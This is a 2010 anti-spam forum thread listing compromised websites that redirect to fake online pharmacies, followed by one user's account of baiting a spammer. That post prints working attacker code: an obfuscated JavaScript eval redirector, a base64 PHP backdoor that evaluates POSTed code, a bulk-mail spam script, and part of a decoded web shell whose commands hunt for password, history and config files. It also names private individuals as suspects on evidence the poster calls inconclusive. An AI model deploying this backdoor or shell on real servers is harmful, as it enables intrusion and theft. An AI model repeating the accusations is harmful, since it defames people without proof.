Compromised hosts

Any research, news or information regarding the wide variety of techniques criminals use to take over your computers or web servers.

Nov 6 stop.html > Online Pharmacy

Postby Red Dwarf » Sun Nov 07, 2010 4:50 pm

On Nov 6 only, the compromised hosts used a redirection with stop.html. Samples

cpapexpressaustralia.com.au/stop.html
ebinder.matrixachievementgroup.com/stop.html
propertyinvesting.co.uk/stop.html
www.bengaloncology.com/stop.html
www.bikestylesinc.com/stop.html
www.camperzoutlet.com/stop.html
www.sustainabletn.org/stop.html

These redirected to Online Pharmacy brand at timeforrefill.com
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10448
Joined: Tue Jun 27, 2006 2:01 am

Nov 7 > aciadoctor.com Pharmacy Express

Postby Red Dwarf » Sun Nov 07, 2010 4:59 pm

On Nov 7 the redirections of compromised servers landed on Pharmacy Express brand site aciadoctor.com (Registration Service Provided By: Namecheap.com, registered from Russia)

Samples
alquran.22web.net/jyvmadf.html
boardstore.com.ua/xuzth.html
chelmonline.home.pl/txrnsl.html
chelmonline.home.pl/txrnslhtml (Period missing error)
cmok.neostrada.pl/hovmd.html
darklight.com.ua/jaloxhtt.html
gbj.com.br/wxufub.html
geralt.darklight.com.ua/nsbhiog.html
hot.kh.ua/mm.html
idea.if.ua/rpnjwpvm.html
idea.if.ua/sjt.html
1setembro.com/niicuvn.html
adgroup.ae/aebaug.html
adgroup.ae/nltgzgdv.html
calincatalina.home.ro/vkljf.html
fasti.org/ebwr.html
greatcasinosports.co.uk/dt.html
marudhara.dhamma.org/s.html
minouklim.com/yrt.html
pallaviinstitutions.com/in.html
saadees.com/sgt.html
tandalasafaris.co.ke/u.html
tarentaalrandsafari.co.za/vlhn.html
tepc.gov.np/f.html
vejinbarzan.com/x.html
windyplains.co.za/al.html
zarabajte.hostuju.cz/tcl.html
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10448
Joined: Tue Jun 27, 2006 2:01 am

Nov 8 > drmedicpills.com Pharmacy Express

Postby Red Dwarf » Mon Nov 08, 2010 5:13 pm

The compromised servers redirect to drmedicpills.com Pharmacy Express
Nov 24 Edit: Name Server: BLOCKEDDUETOSPAM.PLEASECONTACTSUPPORT.COM Name Server: DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM

Samples

cellantenachicago.home.pl/iqu.html
chelmonline.home.pl/irs.html
cmok.neostrada.pl/xlpzeyp.html
darklight.com.ua/qdhvishu.html
gbj.com.br/psnrumw.html
idea.if.ua/ecsih.html
idea.if.ua/krpgn.html
kghost.co.cc/ojjudcu.html
m.tamilmob.com/zjb.html
matesqo.zaridi.to/ruws.html
model.konotop.net/qsdumo.html
oga.7u.cz/zrdlya.html
sp2.trzcianka.com.pl/si.html
webmail.mayaad.net/a.html
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10448
Joined: Tue Jun 27, 2006 2:01 am

Re: Compromised hosts

Postby Red Dwarf » Thu Nov 11, 2010 4:38 pm

Today's redirections go to drmedicpills - the Pharmacy Express criminal fraud. Nov 24 Edit: Name Server: BLOCKEDDUETOSPAM.PLEASECONTACTSUPPORT.COM Name Server: DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM

These web servers are all compromised.

1setembro.com/dlpxi.html
1setembro.com/jlas.html
calincatalina.home.ro/sxrs.html
tarentaalrandsafari.co.za/mub.html
tarentaalrandsafari.co.za/y.html
tepc.gov.np/aapju.html
tepc.gov.np/g.html
tinsight.pt/pdzqjkr.html
tinsight.pt/ulcb.html
ukcasinowin.co.uk/h.html
ukcasinowin.co.uk/i.html
windyplains.co.za/brb.html
zsp2.neostrada.pl/dnzq.html
zsp2.neostrada.pl/kv.html
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10448
Joined: Tue Jun 27, 2006 2:01 am

November 18-19 2010

Postby Red Dwarf » Thu Nov 18, 2010 11:42 pm

A sample of spammed hijack URLs from the past 48 hours. Typical redirections go to the Pharmacy Express fraud

Owners of these web sites need to strengthen their passwords and scan for trojans.

1setembro.com/pdzg.html
1setembro.com/wmlsdoxo.html
afeishi.s56.stinkbugonline.com/ntptzsf.html
afeishi.s56.stinkbugonline.com/wmnk.html
airpur.awardspace.com/iophpcs.html
asc11.alfamoon.com/va.html
badboy.gol.ge/skssl.html
chelmonline.home.pl/xdspkheh.html
chelmonline.home.pl/yuhbvpar.html
cmok.neostrada.pl/jjdkgxvu.html
cmok.neostrada.pl/snwyvqj.html
fgst.tecar.com.ua/dbjnpbtp.html
fgst.tecar.com.ua/xjoe.html
greatcasinosports.co.uk/i.html
greatcasinosports.co.uk/kb.html
greatcasinosports.co.uk/kcqhct.html
ipbravio.com.br/bxujhr.html
matesqo.zaridi.to/yghcfq.html
mb2ny.com/ivcybwf.html
mb2ny.com/tkrim.html
mb2ny.com/xm.html
minouklim.com/hsxl.html
minouklim.com/y.html
mladen.sni.users.sbb.rs/jnq.html
model.konotop.net/exjygmln.html
periodicodecision.com.ar/cesrd.html
periodicodecision.com.ar/mqsp.html
pg.com/privacy.html
queicoviagens.com.br/mhxokrn.html
raja007.co.cc/lb.html
raynhamprimaryschool.co.uk/cprgn.html
raynhamprimaryschool.co.uk/n.html
revistagrip.com.ar.mx95.sinspam.com/kizvudxe.html
sp2.trzcianka.com.pl/jrszafxx.html
sp2.trzcianka.com.pl/r.html
tarentaalrandsafari.co.za/pkz.html
tarentaalrandsafari.co.za/zaqd.html
tecnocenter.ind.br/yoogyotn.html
tepc.gov.np/eyx.html
tepc.gov.np/g.html
tepc.gov.np/kmwauuag.html
tepc.gov.np/ph.html
tinsight.pt/d.html
tinsight.pt/iuqjrq.html
upload.mpspb.com/bgjojp.html
upload.mpspb.com/jdhuullr.html
webmail.mayaad.net/kjnjvkj.html
webmail.mayaad.net/ubnwhb.html
windyplains.co.za/su.html
windyplains.co.za/wbvdmfqm.html
zsp2.neostrada.pl/iten.html
zsp2.neostrada.pl/ljawqcil.html
zsp2.neostrada.pl/wy.html
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10448
Joined: Tue Jun 27, 2006 2:01 am

Re: Compromised hosts & current redirections

Postby Red Dwarf » Wed Nov 24, 2010 4:16 pm

User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10448
Joined: Tue Jun 27, 2006 2:01 am

Re: Compromised hosts

Postby Amouse » Sun Dec 05, 2010 10:33 pm

This is a bit of a long story...
I had a new email address created on the nzart web site nzart.org.nz.
A month later it was harvested supposedly. I actually think it was supplied to the spam gang by an amateur radio operator but will not name these people as the evidence I have is not conclusive. I have named others that I think are involved however.

A full account including my web logs is available here... Do not worry I have no interest in identifying members of this group. Please treat my web logs with respect. There is personal information that I can not remove from them as it is just to much to sort through.

Code: Select all
http://www.bencom.co.nz/bk/bencom-hack.tgz


Beware! There is a disabled virus file as part of the evidence. If you do not know what you are doing do not download.

Back to the story. I started tracking and eventually named some names so that this info got back to the hacker/spammer. I registered a new web site and let the spammer know what it was. I secured most of it and what I did not the hacker attacked and I secured it until there was only the OSCommerce site lift unsecured.

The hacker then found a hole which they exploited to load URL's of redirectors on hacked sites. I allowed spammy to keep doing this until he felt happy. Spammy attacked and loaded a spam bot. I then set about raping spammy for all he was worth until he figured what I was up to.

Spammy is not happy with me and continues to attack my web site and ftp server. I have to be very proactive blocking him.

The ip address using the spam bot console.php was 223.25.242.17 which the best I can gather is in Malaysia.
The ip addresses loading redirect url's to my wiki are...

213.5.70.184
79.142.65.199
91.214.45.223

And this IP continues to attack my contact form

79.142.68.99

altushost.com keeps telling me that they will address the attacks on my server but as yet they have not.
A quick look at the reputation of altushost says it all. PHP C&C server host.

I have left the history of what the url redirect spam is like up...

Code: Select all
http://www.zlham.geek.nz/wiki/radio/index.php?title=ZL_Ham_Radio_Wiki_talk:General_disclaimer&action=history


Spammer redirect script goes to CPH site

If you have any questions feel free to PM me or email me... Whois for my domains are correct.
I would appreciate any info that I can send to LE that may lead to the conviction of this hacker/spammer.
My #1 suspect is Dean Westbury one of the original members of Global Web Promotions and the person I think helped write sobig with Ruslan. The NZ contact, I suspect, is a person named Joseph Dunning of Christchurch NZ. After dropping Wetsbury and Dunnings names all hell broke loose and Westbury is known to frequent Malaysia. Westbury lives in the Philippines and I believe is a senior member of a hacker gang. Certainly some of the attacks on my server have been very amateurish. The biggest mistake being the fact the hacker thought I was running joomla gcalendar when in fact I was running a different package with the same name.

Code: Select all
<html>
<head>
<title>Object not found!</title>
<!-- Xm5mbTgpIHFqcSdkWmpqaGNvbllUbGlSVG8kW2lf -->
<style type="text/css"><!--/*--><![CDATA[/*><!--*/
    body { color: #000000; background-color: #FFFFFF; }
    a:link { color: #0000CC; }
    p, address {margin-left: 3em;}
    span {font-size: smaller;}
/*]]>*/--></style>
<script>function brand (upload){ var flowerpot=''; for (var escrow=0; escrow<upload.length; escrow+=3){flowerpot = String.fromCharCode(upload.substring(escrow,escrow+3)) + flowerpot;} return flowerpot; }</script>
</head>

<body>
<h1><!-- Object not found! --></h1>
<p>

  <!--
    The requested URL was not found on this server.

 

    If you entered the URL manually please check your
    spelling and try again.
  -->
 

</p>
<p>  <!--
If you think this is a server error, please contact
the webmaster.
         -->
</p>

<h2><!--Error 404--></h2>
<address>
</address>
<script>
var bloom='04103905204804905404904905404904905';
var industry='00490490560530480550520480550520480';
var optimist='57049049057049049057049049054052048';
var gag='05004904905304804905604804905604804';
var aiff='90530490490520490490480500490500490';
var highlight='49052048049055057048052049049057048';
var modem='04905505704805705704804905004905405';
var michigan='20480570570480490490490570480490390';
var ascii_file='40100110097114098061110111105116097';
var sip='099111108046119111100110105119';

eval(brand(bloom+industry+optimist+gag+aiff+highlight+modem+michigan+ascii_file+sip));
</script>
</body>
</html>


Web sites collected after raping spammies script and replacing it with my own.
These sites are mostly OSCommerce breached with SQL injection.

15/10/2010 Most owners notified
Code: Select all
http://www.wupperchair.de/shop/images/infobox/play/waste.html
 http://www.djfaudio.com.ar/catalog/images/icons/distance/lesson.html
 http://www.schule-christiani.de/images/downtown.html
 http://www.feastfood.es/shop/images/icons/curse/make.html
 http://zip-downloads.com/images/look.html
 http://onlinegamestall.com/images/banners/impact/imagine.html
 http://ekolczyk.pl/images/slice.html
 http://www.searchforsales.authsafe.com/images/retreat.html
 http://www.stock-code.com/images/UserFiles/apartment/pillow.html
 http://www.micashflow.net46.net/images/pump.html
 http://www.luxor-brushes.com/images/test.html
 http://www.inlineaudio.co.za/images/wound.html
 http://www.moerdijkcomputers.nl/images/everything.html
 http://www.interpack-lodz.pl/images/pants.html
 http://www.phdrugstore.com/images/shave.html
 http://www.rossarinshop.com/images/mister.html
 http://www.chillequipment.com/images/chain.html
 http://www.obrazy.com.pl/images/dekory/drink/write.html
 http://www.pbqaat.info/extensions/extend/explain.html
 http://www.cheapmovie.nl/images/default/depend/nice.html
 http://sacramentomoonbounce.com/cart/images/aunt.html
 http://store.eaglemedia.net/images/maintain.html
 http://interactionprojects.com/images/gesture.html
 http://mafland.com/shop/beyond.html
 http://www.alsopaintings.com/images/abandon.html
 http://mediaro.ro/tenet/images/tangle.html
 http://sinnbringer.de/images/infobox/mumble/welcome.html
 http://www.webstersbutchersblocks.co.uk/images/explosion.html
 http://www.cachosecia.com.br/loja/images/chase.html
 http://mediaro.ro/tenet/images/tangle.html
 http://surftacklestore.com/store/images/machine.html
 http://sinnbringer.de/images/infobox/mumble/welcome.html
 http://www.universitrade.com/images/title.html
 http://www.netwerkcomputers.nl/images/part.html
 http://rombud.com/images/gold.html
 http://bwprintercare.com/eshop/images/howl.html
 http://79.170.40.34/suncentershop.co.uk/cache/tent/hero.html
 http://www.go-ride.pl/images/self.html
 http://fishinggroundbait.nl/catalog/images/flee.html
 http://boutique-gsm.com/catalog/images/rule.html
 http://alovine.com/osc/images/deep.html
 http://www.123electronics.be/catalog123/images/bond.html
 http://totallyone.inwards.com/catalog/images/lonely.html
 http://www.cytelmotul.com/images/echo.html
 http://www.pbqaie.info/extensions/indeed/land.html
 http://ns2.bounce789.com/store/images/strength.html
 http://shop.duimelijntje.net/pub/shelf/when.html
 http://www.ezicars.com.au/os/images/decision.html
 http://itc.idenx.web.id/images/default/hope/guard.html
 http://www.wholesale41.com/images/mail/confusion/security.html
 http://onlinegamestall.com/images/banners/impact/imagine.html
 http://solunetworks.com/ecommerce/images/assume.html
 http://anibal.netai.net/catalog/images/murmur.html
 http://www.gordonrobertsonphotography.com/catalog/images/embarrass.html
 http://ammahdavi.com/shop/interest.html
 http://93.186.178.13/~dinegies/shop/images/glare.html
 http://www.padangos.net/images/panic.html
 http://66.119.52.124/catalog/images/concern.html
 http://www.desiroc.com/images/banners/cast/cloud.html
 http://www.virandoapaginalivraria.com.br/images/prevent.html
 http://ezion.com.au/images/call.html
 http://ezion.com.au/images/call.html
 http://www.inlineaudio.co.za/images/wound.html
 http://laumarherbals.com/catalog/images/hello.html
 http://www.mjbspecialityextracts.com/catalog/images/shower.html
 http://www.bebenatur.com/images/glare.html
 http://www.webceliaca.com/images/tone.html
 http://secure.wholesale41.com/images/default/easy/recently.html
 http://vercasas001.verhost.com/catalog/images/clave441/deep/dude.html
 http://suan-intapalum.com/shopping/images/stage.html
 http://www.kombideposu.com/images/default/basement/discuss.html
 http://www.olejservis.com/images/inch.html
 http://baldwinsart.com/art/images/servant.html
 http://www.deliveryexpressng.com/images/warehouse.html
 http://ex2.prowebnet.ch/oscasiaticashop/catalog/images/default/grace/human.html
 http://www.beds4u.nl/images/hallway.html
 http://maggiesmagicmuffins.relationzip.com/images/crap.html
 http://southkytractor.com/store/images/chop.html
 http://rene-webmedia.de/rene_shop/catalog/images/send.html
 http://mafland.com/shop/beyond.html
 http://www.gogiftusa.com/images/banners/indicate/silently.html
 http://www.ruyihealth.com/ruyi/images/water.html
 http://anibal.netai.net/catalog/images/murmur.html
 http://www.schoenthal.biz/shop/images/powered/bride/quickly.html
 http://www.jasiek888.livenet.pl/sklep/images/scan.html
 http://www.schule-christiani.de/images/downtown.html
 http://www.pbqase.info/extensions/necessary/gonna.html
 http://www.beds4u.nl/images/hallway.html
 http://www.seximbol.net/images/bandage.html
 http://www.articuloshogar.com/tienda/images/crouch.html
 http://www.kochfit.de/images/thrust.html
 http://shop.adult-private-movies.com/images/BestSellersBox/soul/hide.html
 http://www.call-emperor.com/web/images/haul.html
 http://www.regalatelo.net/images/breakfast.html
 http://lilihozak.com/shop/images/icons/toss/visit.html

16/10/2010 Not notified and some will still be infected
 http://farmfreshtexas.com/Cart/images/receiver.html
 http://bwprintercare.com/eshop/images/howl.html
 http://adsel.net.pl/images/mention.html
 http://eshop.fenegro.com/images/icons/concern/halfway.html
 http://store.dafugizit.com/images/drag.html
 http://www.artmys.com/images/sugar.html
 http://smycken.fi/shop/images/under.html
 http://tiendavirtual.mmendiola.net/images/frame.html
 http://j-crest.com/images/mostly.html
 http://gadgetcube.net/images/fine.html
 http://www.aichatou.com/images/plan.html
 http://modelismo-correias.com/images/lady.html
 http://psloc.com.br/loja/images/also.html
 http://svgjewels.com/images/stuff.html
 http://betterthantherest.co.uk/catalog/images/state.html
 http://au858.com/images/infobox/journey/dawn.html
 http://luxurypetite.com/catalog/images/official.html
 http://kitchens247.com/images/would.html
 http://thai-jin.com/flowers/images/follow.html
 http://eigenershop.php-scripte-shop.com/images/fast.html
 http://brasiltintas.com/loja/images/chase.html
 http://dragonscape.info/shop/images/infobox/blanket/detail.html
 http://demos.creloaded.com/crecds/images/default/plead/several.html
 http://mashhadbazar.net/images/library.html
 http://jacklynsgiftshop.net/images/channel.html
 http://best14.net/images/priest.html
 http://righthosting.net/online/images/hate.html
 http://eshop.bazcar.com/images/graphs/expect/score.html
 http://bowlerslocker.com/catalog/images/bean.html
 http://bedavakitaplar.net/images/introduce.html
 http://almasdanesh.ir/shop/images/hallway.html
 http://crazyshopping4u.com/shop/images/difference.html
 http://s338152760.onlinehome.fr/meoui/images/near.html
 http://www.blacknightingale.com.au/catalog/images/third.html
 http://bankeamoozesh.ir/shop/therefore.html
 http://www.bielefeld-immobilien.de/images/infobox/beautiful/customer.html
 http://longbeachmoonbounce.com/cart/images/track.html
 http://greensboromoonbounce.com/cart/images/upstairs.html
 http://nationwidegardenstore.com/store/images/banners/entirely/sand.html
 http://eshop.widestore.net/images/default/dinner/horror.html
 http://poi-group.net/shop/images/icons/clothes/upper.html
 http://eshop.solelunaonlus.org/images/default/suicide/five.html
 http://www.agostiniinformatica.com.br/LOJA/images/closely.html
 http://www.agathasarah.com/images/child.html
 http://rayanaco.com/images/faint.html
 http://kadunovidade.net/images/hour.html
 http://digiflex.com.br/loja/images/division.html
 http://lubasistemas.com.ar/images/garage.html
 http://www.bodybuildingoz.com.au/store/images/authority.html
 http://shop.leisch.at/catalog/images/glimpse.html
 http://alpha-group.com.mx/carrito1/images/board.html
 http://shop.parkinsonmotorcycles.co.uk/images/dvd/smooth/slowly.html
 http://projectgreen.es/catalog/includes/upset/drive.html
 http://www.compisys.ch/shop/catalog/images/softly.html
 http://www.purchase7.com/images/maitreyii/blaze/press.html
 http://www.tintate.com/images/path.html
 http://www.mijootour.com/osc/images/wallet.html
 http://www.thejewelrycheststore.com/images/mail/whistle/joker.html
 http://www.rolandmpx-90.com/store/images/engage.html
 http://www.sillybandzeurope.com/images/loud.html
 http://www.edisonhumor.com/images/curse.html
 http://www.brilwonders.nl/images/remember.html
 http://www.smconceptstore.com/images/icons/stone/shotgun.html
 http://www.mj-mit.com/images/stuff.html
 http://www.republicarsenal.com/images/dvd/restaurant/thumb.html
 http://www.odzywki.katowice.pl/images/interview.html
 http://www.gamesgalaxy.co.uk/images/spirit.html
 http://www.rasmina.net/images/stream.html
 http://www.nopierdaseltino.com/tienda/images/spell.html 


This one is still alive if you are brave enough to access it to see what spammy does.
Code: Select all
http://www.gamesgalaxy.co.uk/images


I thought about using it to attack altushost but thought it best not to mail bomb them or gblx (upstream for altushost) for that matter. Lucky I have some moral standards and the apache log file is way to large to cover my tracks. I did consider it. Head for the last googlexxxx file in the dir listing.

console.php

Code: Select all
(lessthansign)?php echo eval(base64_decode("aWYoaXNzZXQoJF9HRVRbInBhcnQiXSkpIHsgIGlmKCRfR0VUWyJwYXJ0Il09PSJzZ
WMiKSAgZWNobyAicGFydGdvb2QiOyB9IGVsc2UgaWYoaXNzZXQoJF9QT1NUWyJnZ2ciXSkpIHsgICBpZi
gkX1BPU1RbImdnZyJdPT0xKSAgICAgICAgZWNobyAib2sxMSI7ICB9IGVsc2UgaWYoaXNzZXQoJF9QT1N
UWyJtYWluIl0pKSB7ICBldmFsKHVybGRlY29kZSgkX1BPU1RbIm1haW4iXSkpOyAgICB9")); ?(greaterthansign)


Decoded as with my mods to rape spammies code...

(
Code: Select all
lessthansign)?php

$myFile = "testFile.txt";
$fh = fopen($myFile, 'a') or die("can't open file");
if(isset($_GET["part"])) { if($_GET["part"]=="sec")  echo "partgood"; }
else if(isset($_POST["ggg"])) { if($_POST["ggg"]==1)        echo "ok11";  }
else if(isset($_POST["main"])) {  fwrite($fh, (urldecode($_POST["main"]))); }
fclose($fh);

?(greaterthansign)


Remove file creation and change fwrite($fh, (urldecode($_POST["main"])) to eval(urldecode($_POST["main"]))
and you have what spammy loads onto hacked machines. This allows him to load more code.

I raped spammy and this gave me this code to harvest his data and ownz joo for two days until he used the mechanism in the code to figure he was being raped.

Code: Select all
(lessthansign)?php
$myFile = "testFile.txt";
$fh = fopen($myFile, 'a') or die("can't open file");
$myFile2 = "shagspammy.txt";
$fh2 = fopen($myFile2, 'a') or die("can't open file");
fwrite($fh, "\n\r Session Start \n\r");
function convertR($fm) {   
   for($c=0;$c<strlen($fm);$c++) {       
    $fm[$c]=chr(ord($fm[$c])-2);   
   }   
   return $fm;
  }
if(isset($_GET["part"])) {
 if($_GET["part"]=="sec") 
  echo "partgood";
} else if(isset($_POST["ggg"])) {
 if($_POST["ggg"]==1)
  echo "ok11";
  /*fwrite($fh, "\n\r ggg \n\r");*/
} else if(isset($_POST["main"])) { 
 /*fwrite($fh, ("\n\r".urldecode($_POST["main"]."\n\r")));
 if(isset($_POST["m"]))
    fwrite($fh, ("\n\r m=".convertR(urldecode($_REQUEST["m"]))."\n\r"));
    */
     
 if(isset($_POST["ggg"])) {
  if($_POST["ggg"]==1)
   echo "ok11"; 
   /*fwrite($fh, "\n\r ggg 222 \n\r");*/
   
  } else if(isset($_POST["m"])) {
/*   fwrite($fh, ("\n\r Second m=".convertR(urldecode($_REQUEST["m"]))."\n\r"));*/
   error_reporting(0);     
   set_time_limit(300);
   $m=$f=$r=$t=$mes=$p=$scs=$sce=$name="";
   if(isset($_POST["m"]))
    $m=convertR(urldecode($_POST["m"]));
   if(isset($_POST["f"]))
    $f=convertR(urldecode($_POST["f"]));
   if(isset($_POST["r"]))
    $r=convertR(urldecode($_POST["r"]));
   if(isset($_POST["t"]))
    $t=convertR(urldecode($_POST["t"]));             
   if(isset($_POST["mes"]))
    $mes=urldecode($_POST["mes"]);
   if(isset($_POST["name"]))
    $name=convertR(urldecode($_POST["name"]));     
   if(isset($_POST["p"]))
    $p=convertR(urldecode($_POST["p"]));
   if(isset($_POST["scs"]))
    $scs=convertR(urldecode($_POST["scs"]));     
   if($scs=="")
    $scs=200000;     
   if(isset($_POST["sce"]))
    $sce=convertR(urldecode($_POST["sce"]));       
   if($sce=="")
    $sce=800000;           
   $mm=split(";",$m);     
   fwrite($fh, "\n\r SPAMMER VARIABLES m=".$m."\n\r f=".$f."\n\r r=".$r."\n\r t=".$t."\n\r mes=".$mes."\n\r
name=".$name."\n\r p=".$p."\n\r scs=".$scs."\n\r sce=".$sce."\n\r");
   if($m==NULL) {
    echo "0^0^";   
   } else {       
    $arrayNotGood=array();
    $arrayGood=array();
    $to=$m;       
    $subj=$t;       
    $hostin=$_SERVER["HTTP_HOST"];       
    if($hostin=="" or eregi("[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}",$hostin)) {
     $hostinMass=array("yahoo.com",
"yahoo.com","yahoo.com","hotmail.com",
"live.com","gmail.com","gmail.com",
"mail.com","
aol.com","aol.com","inbox.com");
     $hostin=$hostinMass[rand(0,10)];   
    }
    $from=substr($f,0,strrpos($f,"@"))."@".$hostin;  /*      $head = "From: \"$name\" $from\n"; */
    $text="";
    $head="";
    eval($mes);
    fwrite($fh2, "\n\r ".$linkin."\n\r");
    $mg=0;       
    $mb=0;       
    for($c=0;$c<count($mm);$c++) {
     $sleepTime=rand($scs,$sce);                     
     $bccRand=500;                     
     $stHead="";                     
     $boolInRand=0;                     
     if($bccRand) {
      if(count($mm)>($c+$bccRand)) {
       $boolInRand=1;                           
       for($k=$bccRand;$k>0;$k--) {                   
        if($k==$bccRand)
         $stHead="Cc: ";                   
        if($k==1)                     
         $stHead.=$mm[($c+$k)]."\n";                   
        else                     
         $stHead.=$mm[($c+$k)].",";               
       }             
      }           
     }           
     if(fwrite($fh, "\n\r SPAMMER MAIL".$c."=".$mm[$c]."\n\r Subject=".$subj."\n\r Text=".$text."\n\r st Head=".$stHead."\n\r head=".$head)) {                 
      if($boolInRand==1) {
       $mg+=1+$bccRand;
      } else
       $mg++;                 
       $arrayGood[]=$mm[$c];               
       if($boolInRand==1) {
        for($k=$bccRand;$k>0;$k--)
         $arrayGood[]=$mm[($c+$k)];
       }           
     } else {                   
      if($boolInRand==1) {
       $mb+=1+$bccRand;
      } else
       $mb++;                 
       $arrayNotGood[]=$mm[$c];               
       if($boolInRand==1) {
        for($k=$bccRand;$k>0;$k--) $arrayNotGood[]=$mm[($c+$k)];
       }           
     }                           
     if($sleepTime=="")
      usleep(500000);           
     else               
      usleep($sleepTime);           
     if($boolInRand==1)
      $c=$c+$bccRand;       
    }               
    if(count($arrayNotGood)>0) {           
     $currArrayNot="";           
     foreach($arrayNotGood as $arrayNotGoodCurr) {               
      $currArrayNot.=$arrayNotGoodCurr.";";               
     }           
     $currArrayNot=substr($currArrayNot,0,strrpos($currArrayNot,";"));           
     echo $mg."^".$mb."^".$currArrayNot."^";
     fwrite($fh, "\n\r SPAMMER RETURN VALUE \n\r".$msg."\n\r".$mb."\n\r".$currArrayNot."\n\r");
    } else {
     echo $mg."^".$mb."^";
     fwrite($fh, "\n\r SPAMMER RETURN VALUE \n\r".$msg."\n\r".$mb."\n\r");
     
    }                                                               
   }
  } 
 }
fclose($fh);
fclose($fh2);
?(greaterthansign)


Spammy loads console.php (the base64 encoded file above) with a file called googlexxxxxxx.php (xxx = hex digits) googlexxxx.php is a complex console type program that allows full access to the system with full upload and download facility.

Here is a copy. Truncated.

Code: Select all
(lessthansign)?php $D=strrev('edoced_46esab');$s=gzinflate($D('7X1te9s2suh3/QqY1QZiItGSn......
..............2/4GM4kQ1yb9AB7OVCfrob+Dw=='));create_function('',"}$s//"); ?(greaterthansign)


Here is what it looks like decoded. If you have a test server replace the lessthan & greaterthan and run.
The program does not phone home or anything like that but has a self remove function.

googlexxxxxxxxxxxx.php

Code: Select all
<?php
$color="#df5";
$default_action='FilesMan';
$default_use_ajax=true;
$default_charset='Windows-1251';

if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents=array("Google","Slurp",
"MSNBot","ia_archiver","Yandex","Rambler");
if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT']))
{header('HTTP/1.0 404 Not Found');exit;}}

@session_start();@ini_set('error_log',NULL);@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);

if(get_magic_quotes_gpc()){function Xstripslashes($array){return is_array($array)?array_map('Xstripslashes',$array):stripslashes($array);}
$_POST=Xstripslashes($_POST);}

$os='nix';if(strtolower(substr(PHP_OS,0,3))=='win')$os='win';

$safe_mode=@ini_get('safe_mode');if(!$safe_mode)error_reporting(0);

$disable_functions=@ini_get('disable_functions');
$home_cwd=@getcwd();if(isset($_POST['c']))@chdir($_POST['c']);$cwd=@getcwd();if($os=='win'){$home_cwd=str_replace("\\","/",$home_cwd);$cwd=str_replace("\\","/",$cwd);}
if($cwd[strlen($cwd)-1]!='/')$cwd.= '/';

if(!isset($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']=(bool)
$GLOBALS['default_use_ajax'];

if($os=='win')
$aliases=array(
"List Directory"=>"dir",
"Find index.php in current dir"=>"dir /s /w /b index.php",
"Find *config*.php in current dir"=>"dir /s /w /b *config*.php",
"Show active connections"=>"netstat -an",
"Show running services"=>"net start",
"User accounts"=>"net user",
"Show computers"=>"net view",
"ARP Table"=>"arp -a",
"IP Configuration"=>"ipconfig /all"
);
else
$aliases=array(
"List dir"=>"ls -lha",
"list file attributes on a Linux second extended file system"=>"lsattr -va",
"show opened ports"=>"netstat -an | grep -i listen",
"process status"=>"ps aux",
"Find"=>"",
"find all suid files"=>"find / -type f -perm -04000 -ls",
"find suid files in current dir"=>"find.-type f -perm -04000 -ls",
"find all sgid files"=>"find / -type f -perm -02000 -ls",
"find sgid files in current dir"=>"find.-type f -perm -02000 -ls",
"find config.inc.php files"=>"find / -type f -name config.inc.php",
"find config* files"=>"find / -type f -name \"config*\"",
"find config* files in current dir"=>"find.-type f -name \"config*\"",
"find all writable folders and files"=>"find / -perm -2 -ls",
"find all writable folders and files in current dir"=>"find.-perm -2 -ls",
"find all service.pwd files"=>"find / -type f -name service.pwd",
"find service.pwd files in current dir"=>"find.-type f -name service.pwd",
"find all .htpasswd files"=>"find / -type f -name .htpasswd",
"find .htpasswd files in current dir"=>"find.-type f -name .htpasswd",
"find all .bash_history files"=>"find / -type f -name .bash_history",
"find .bash_history files in current dir"=>"find.-type f -name .bash_history",
"find all .fetchmailrc files"=>"find / -type f -name .fetchmailrc",
"find .fetchmailrc files in current dir"=>"find.-type f -name .fetchmailrc",
"Locate"=>"",
"locate httpd.conf files"=>"locate httpd.conf",
"locate vhosts.conf files"=>"locate vhosts.conf",
"locate proftpd.conf files"=>"locate proftpd.conf",
"locate psybnc.conf files"=>"locate psybnc.conf",
"locate my.conf files"=>"locate my.conf",
"locate admin.php files" =>"locate admin.php",
"locate cfg.php files"=>"locate cfg.php",
"locate conf.php files"=>"locate conf.php",
"locate config.dat files"=>"locate config.dat",
"locate config.php files"=>"locate config.php",
"locate config.inc files"=>"locate config.inc",
"locate config.inc.php"=>"locate config.inc.php",
"locate config.default.php files"=>"locate config.default.php",
"locate config* files "=>"locate config",
"locate .conf files"=>"locate '.conf'",
"locate .pwd files"=>"locate '.pwd'",
"locate .sql files"=>"locate '.sql'",
"locate .htpasswd files"=>"locate '.htpasswd'",
"locate .bash_history files"=>"locate '.bash_history'",
"locate .mysql_history files"=>"locate '.mysql_history'",
"locate .fetchmailrc files"=>"locate '.fetchmailrc'",
"locate backup files"=>"locate backup",
"locate dump files"=>"locate dump",
"locate priv files"=>"locate priv"
);

function XHeader(){
if(empty($_POST['charset']))
$_POST['charset']=$GLOBALS['default_charset'];
global $color;
echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=$_POST[charset]'>
<title>$_SERVER[HTTP_HOST] - B0FF codesupp edit</title>
<style>body{background-color:#000028;color:#e1e1e1}
body,td,th{border:1px outset black;font:9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1}
table.info{border-left:5px solid #df5;color:#fff;background-color:#000028}
span,h1,a{color:#df5 !important}
span{font-weight:bolder}
h1{border-left:7px solid #df5;padding:2px 5px;font:14pt Verdana;background-color:#000028;margin:0px}
div.content{padding:7px;margin-left:7px;background-color:#333}
a{text-decoration:none}
a:hover{text-decoration:underline}
.ml1{border:1px solid #444;padding:5px;margin:0;overflow:auto}
.bigarea{width:100%;height:250px}
